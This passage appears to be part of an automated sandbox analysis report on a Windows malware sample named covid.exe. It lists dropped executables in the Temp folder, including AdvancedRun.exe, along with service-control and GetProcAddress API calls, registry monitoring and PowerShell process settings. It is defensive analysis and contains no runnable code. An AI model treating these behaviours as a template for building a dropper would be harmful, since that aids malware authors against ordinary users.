Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 7_2_0040B550 push eax; ret 7_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 7_2_0040B550 push eax; ret 7_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 7_2_0040B50D push ecx; ret 7_2_0040B51D
Source: C:\Users\user\Desktop\covid.exe | File created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe (dropped file)
Source: C:\Users\user\Desktop\covid.exe | File created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe (dropped file)
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\covid.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: